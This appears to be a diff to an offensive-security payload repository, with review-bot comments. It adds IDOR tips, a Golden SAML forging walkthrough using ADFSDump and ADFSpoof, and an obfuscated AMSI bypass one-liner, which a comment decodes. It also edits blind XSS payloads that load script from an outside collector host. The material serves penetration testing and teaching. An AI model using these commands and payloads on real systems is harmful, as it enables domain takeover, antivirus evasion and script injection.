diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index b4f2b38..9a1186c 100644 --- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md @@ -11,9 +11,11 @@ ## Tools -* [Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3v/Corsy/) +* [s0md3v/Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3v/Corsy/) +* [chenjj/CORScanner - Fast CORS misconfiguration vulnerabilities scanner](https://github.com/chenjj/CORScanner) * [PostMessage POC Builder - @honoki](https://tools.honoki.net/postmessage.html) + ## Prerequisites * BURP HEADER> `Origin: https://evil.com` diff --git a/Insecure Direct Object References/README.md b/Insecure Direct Object References/README.md index 7f5ac43..c3fda4c 100644 --- a/Insecure Direct Object References/README.md +++ b/Insecure Direct Object References/README.md @@ -6,14 +6,15 @@ * [Tools](#tools) * [Exploit](#exploit) + * [IDOR Tips](#idor-tips) * [Examples](#examples) * [References](#references) ## Tools -- Burp Suite plugin Authz -- Burp Suite plugin AuthMatrix -- Burp Suite plugin Authorize +- [BApp Store > Authz](https://portswigger.net/bappstore/4316cc18ac5f434884b2089831c7d19e) +- [BApp Store > AuthMatrix](https://portswigger.net/bappstore/30d8ee9f40c041b0bfec67441aad158e) +- [BApp Store > Autorize](https://portswigger.net/bappstore/f9bbac8c4acf4aefa4d7dc92a991af2f) ## Exploit @@ -43,6 +44,15 @@ The value of a parameter is used directly to access application functionality http://foo.bar/accessPage?menuitem=12 ``` +### IDOR Tips + +* Change the HTTP request: POST → PUT +* Change the content type: XML → JSON +* Increment/decrement numerical values (1,2,3,..) +* GUID/UUID might be weak +* Transform numerical values to arrays: `{"id":19} → {"id":[19]}` + + ## Examples * [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789) 
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 75bb712..bfee165 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -86,6 +86,8 @@ - [ESC9 - No Security Extension](#esc9---no-security-extension) - [Certifried CVE-2022-26923](#certifried-cve-2022-26923) - [Pass-The-Certificate](#pass-the-certificate) + - [Active Directory Federation Services](#active-directory-federation-services) + - [ADFS - Golden SAML](#adfs---golden-saml) - [UnPAC The Hash](#unpac-the-hash) - [Shadow Credentials](#shadow-credentials) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) @@ -1592,6 +1594,8 @@ Add-DomainGroupMember -Identity 'LAPS READ' -Members 'user1' -Credential $cred - > One notable difference between a **Golden Ticket** attack and the **Golden GMSA** attack is that they no way of rotating the KDS root key secret. Therefore, if a KDS root key is compromised, there is no way to protect the gMSAs associated with it. +:warning: You can't "force reset" a gMSA password, because a gMSA's password never changes. The password is derived from the KDS root key and `ManagedPasswordIntervalInDays`, so every Domain Controller can at any time compute what the password is, what it used to be, and what it will be at any point in the future. + * Using [GoldenGMSA](https://github.com/Semperis/GoldenGMSA) ```ps1 # Enumerate all gMSAs 
@@ -2639,6 +2643,43 @@ Jane@corp.local is allowed to enroll in the certificate template ESC9 that speci certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx" ``` +### Active Directory Federation Services + +#### ADFS - Golden SAML + +Requirements: +* ADFS service account +* The private key (PFX with the decryption password) + +Exploit: +* Use [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) to dump ADFS informations +* Convert PFX and Private key to binary format + ```ps1 + # For the pfx + echo AAAAAQAAAAAEE[...]Qla6 | base64 -d > EncryptedPfx.bin + # For the private key + echo f7404c7f[...]aabd8b | xxd -r -p > dkmKey.bin + ``` +* Create the Golden SAML using [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof) + ```ps1 + mkdir ADFSpoofTools + cd $_ + git clone https://github.com/dmb2168/cryptography.git + git clone https://github.com/mandiant/ADFSpoof.git + virtualenv3 venvADFSSpoof + source venvADFSSpoof/bin/activate + pip install lxml + pip install signxml + pip uninstall -y cryptography + cd cryptography + pip install -e . + cd ../ADFSpoof + pip install -r requirements.txt + python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.pentest.lab saml2 --endpoint https://www.contoso.com/adfs/ls + /SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions 'PENTEST\administrator' + ``` + + ### UnPAC The Hash Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User via its certificate. 
@@ -4044,3 +4085,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html) * [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/) * [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability) +* [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - AMSI Bypass.md b/Methodology and Resources/Windows - AMSI Bypass.md index 40573d3..e5f05ba 100644 --- a/Methodology and Resources/Windows - AMSI Bypass.md +++ b/Methodology and Resources/Windows - AMSI Bypass.md @@ -759,6 +759,15 @@ Add-Type -TypeDefinition $Winpatch -Language CSharp [patch]::it() ``` +## Other interesting AMSI bypass + +* [tihanyin/PSSW100AVB/AMSI_bypass_2021_09.ps1](https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_09.ps1) + ```ps1 + $A="5492868772801748688168747280728187173688878280688776828" + $B="1173680867656877679866880867644817687416876797271" + [Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B).substring(($_*2),2))})-replace " " ).GetField([string](38..51|%{[char][int](29+($A+$B).substring(($_*2),2))})-replace " ",'Non' + 'Public,Static').SetValue($null,$true) + ``` + ## AMSI.fail > AMSI.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process. The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures. - https://amsi.fail/ 
diff --git a/Upload Insecure Files/Images/file-upload-mindmap.png b/Upload Insecure Files/Images/file-upload-mindmap.png new file mode 100644 index 0000000..964d174 Binary files /dev/null and b/Upload Insecure Files/Images/file-upload-mindmap.png differ diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 6ee8adc..15083b8 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -23,8 +23,11 @@ - [Burp > Upload Scanner](https://portswigger.net/bappstore/b2244cbb6953442cb3c82fa0a0d908fa) - [ZAP > FileUpload AddOn](https://www.zaproxy.org/blog/2021-08-20-zap-fileupload-addon/) + ## Exploits +![file-upload-mindmap.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/Upload%20Insecure%20Files/Images/file-upload-mindmap.png?raw=true) + ### Defaults extensions * PHP Server diff --git a/XSS Injection/README.md b/XSS Injection/README.md index da1e166..6b53335 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -501,14 +501,9 @@ XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https: > XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service. -```javascript -"> - -javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursubdomain.xss.ht\';document.body.appendChild(a)') - - - - +```xml +"> + ``` ### Other Blind XSS tools
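Review bot: In the `### IDOR Tips` hunk of `Insecure Direct Object References/README.md`, `Change the HTTP request: POST → PUT` should read `Change the HTTP method: POST → PUT`, since the verb is what changes, and `GUID/UUID might be weak` does not tell the reader what to test; suggest `GUID/UUID might be predictable (sequential, timestamp-based v1) or leaked elsewhere in the application (other responses, URLs, exports)`. Minor: two blank `+` lines are added before `## Examples` where one is enough.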
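Review bot: In the gMSA hunk of `Methodology and Resources/Active Directory Attack.md`, the added warning contradicts itself: it states that `a gMSA's password never changes`, then that the password is derived from the KDS root key and `ManagedPasswordIntervalInDays`, which is the rotation interval. The password does rotate on that interval; what makes a "force reset" pointless is that the rotation is deterministic, so anyone holding the KDS root key can compute the current, past and future values. Suggested wording: `You can't "force reset" a gMSA password in any useful way: it rotates every ManagedPasswordIntervalInDays, but each value is derived from the KDS root key, so every Domain Controller (and anyone who has the root key) can compute the current, past and future passwords.` While here, the adjacent context line `they no way of rotating the KDS root key secret` is missing `have`.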
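Review bot: In the `### Active Directory Federation Services` hunk of `Active Directory Attack.md`, the file written by the conversion step (`xxd -r -p > dkmKey.bin`) does not match the name passed to ADFSpoof (`DkmKey.bin`); on a case-sensitive filesystem the final command fails, so use one spelling. The `python ADFSpoof.py ...` invocation is also broken across two lines between `https://www.contoso.com/adfs/ls` and `/SamlResponseServlet`; join it or end the first line with a backslash. The `Requirements` list does not match the steps either: the comment `# For the private key` writes `dkmKey.bin`, so the "private key" is the DKM key that ADFSDump reads from AD and that decrypts the `EncryptedPfx` blob (the encrypted token-signing certificate from the ADFS configuration database), not a "PFX with the decryption password"; say `the ADFS service account (to read the configuration database and the DKM key), or the EncryptedPfx and DKM key already dumped with ADFSDump`. Smaller points: `informations` → `information`; the blocks are Linux shell (`base64 -d`, `xxd`, `source venvADFSSpoof/bin/activate`) but are fenced as `ps1`, so tag them `bash`; `virtualenv3` is not a standard command on most distributions, `python3 -m venv venvADFSSpoof` is; and a one-line comment on why the pip `cryptography` package is uninstalled in favour of the `dmb2168/cryptography` fork would stop readers from "fixing" that step.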
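Review bot: In the references hunk of `Active Directory Attack.md`, the added entry's description repeats its title (`Practical guide for Golden SAML - Practical guide step by step to create golden SAML`); the surrounding entries use `Title - Author - Date`, so `Practical guide for Golden SAML - nodauf.dev` with the post date would match. The hunk also leaves the file without a trailing newline (`\ No newline at end of file`) where the previous last line had one.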
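Review bot: In the `## Other interesting AMSI bypass` hunk of `Windows - AMSI Bypass.md`, the one-liner is dropped in with no explanation, which is what a reader of this page needs most: adding 29 to each two-digit chunk of `$A+$B` and casting to `[char]` yields `System.Management.Automation.AmsiUtils` (chunks 0..37) and `amsiInitFailed` (chunks 38..51), `-replace " "` strips the spaces that `[string]` inserts when joining the char array, and `'Non' + 'Public,Static'` is split for the same reason, so this is the classic `[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)` with its strings encoded to dodge signatures. A comment line saying so would make the entry useful. The heading should also be plural, `Other interesting AMSI bypasses`.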
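Review bot: In the `## Exploits` hunk of `Upload Insecure Files/README.md`, the mindmap is embedded through an absolute URL to `swisskyrepo/PayloadsAllTheThings` on `master`, with both `/raw/master/` and `?raw=true` (the query string is redundant on a `/raw/` URL). Since the image is added to `Upload Insecure Files/Images/` in this same patch, a relative reference `![File upload mindmap](Images/file-upload-mindmap.png)` renders in forks, branches and offline clones and gives the image a descriptive alt text instead of the filename. Minor: the hunk adds a second blank line before `## Exploits`.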
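Review bot: In the Blind XSS hunk of `XSS Injection/README.md`, the removed `javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursubdomain.xss.ht\';document.body.appendChild(a)')` line is the only payload in the block for a `javascript:` URL context (an injected `href`, `src` or `location` value); the `">`-prefixed attribute-breakout payloads that remain do not cover that context, so keep it. Also: the fence is changed from `javascript` to `xml`, but the block contains HTML, so `html` is the right tag; and since the paragraph above states that XSS Hunter is deprecated, the remaining `yoursubdomain.xss.ht` host should be a placeholder for the reader's own collector rather than a dead service.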